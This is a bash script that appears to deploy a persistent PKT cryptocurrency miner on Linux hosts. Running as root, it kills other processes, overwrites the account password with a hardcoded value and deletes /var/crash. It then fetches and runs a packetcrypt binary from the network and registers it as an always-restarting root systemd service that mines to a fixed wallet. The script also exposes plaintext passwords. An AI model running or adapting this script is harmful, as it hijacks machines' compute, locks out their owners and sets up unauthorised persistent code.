#!/bin/bash
sudo su
cd /home
sudo pkill chrome
sudo pkill ztool
sudo pkill sang
sudo service pktpool stop
echo -e "ubuntu18042023@123\nDoremon@2012\nDoremon@2012" | passwd

sudo wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O packetcrypt
sudo chmod +x packetcrypt
sudo rm -rf  /lib/systemd/system/pktpool1.service
sudo rm -rf /var/crash
sudo bash -c 'cat <<EOT >>/lib/systemd/system/pktpool1.service 
[Unit]
Description=gpu1
After=network.target
[Service]
ExecStart= /home/packetcrypt ann -p pkt1q7pl84q6djett6zx8cxznelu26wxm54m634g3py http://pool.pkt.world http://pool.pktpool.io http://pool.pkteer.com
WatchdogSec=36000
Restart=always
RestartSec=60
User=root
[Install]
WantedBy=multi-user.target
EOT
' &&

sudo systemctl daemon-reload &&
sudo systemctl enable pktpool1.service &&
sudo service pktpool1 stop  &&
sudo service pktpool1 restart
systemctl daemon-reload &&
systemctl enable pktpool1.service &&
service pktpool1 stop  &&
service pktpool1 restart
top

